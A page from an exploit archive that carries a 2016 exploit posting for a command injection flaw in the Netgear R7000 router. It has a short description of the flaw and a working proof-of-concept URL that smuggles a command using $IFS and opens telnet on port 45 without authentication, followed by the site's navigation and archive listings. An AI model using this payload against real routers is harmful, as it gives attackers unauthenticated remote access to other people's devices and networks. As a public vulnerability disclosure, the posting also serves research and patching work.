Netgear R7000 Command Injection

Netgear R7000 Command Injection: Posted Dec 8, 2016; Authored by Acew0rm; Netgear R7000 suffers from a command injection vulnerability.; tags | exploit; SHA-256 | 8a3bd3bed526f1b1ea246ef0805d27f0da0e7419534db12188712e2368d99170; Download | Favorite | View

Netgear R7000 Command Injection

# Exploit Title: Netgear R7000 - Command Injection
# Date: 6-12-2016
# Exploit Author: Acew0rm
# Contact: https://twitter.com/Acew0rm1
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93
 
-Vulnerability
An unauthenticated user can inject commands threw
http://RouterIP/cgi-bin/;COMMAND.
 
-Proof Of Concept
http://RouterIP/;telnetd$IFS-p$IFS'45' will open telnet on port 45.

Top Authors In Last 30 Days

Red Hat 272 files
Ubuntu 56 files
Debian 19 files
LiquidWorm 18 files
Apple 9 files
Gentoo 5 files
Google Security Research 3 files
Chokri Hammedi 3 files
Alter Prime 3 files
Valentin Lobstein 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,937)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,337)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,979)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

Netgear R7000 Command Injection

Netgear R7000 Command Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Netgear R7000 Command Injection

Share This

Netgear R7000 Command Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems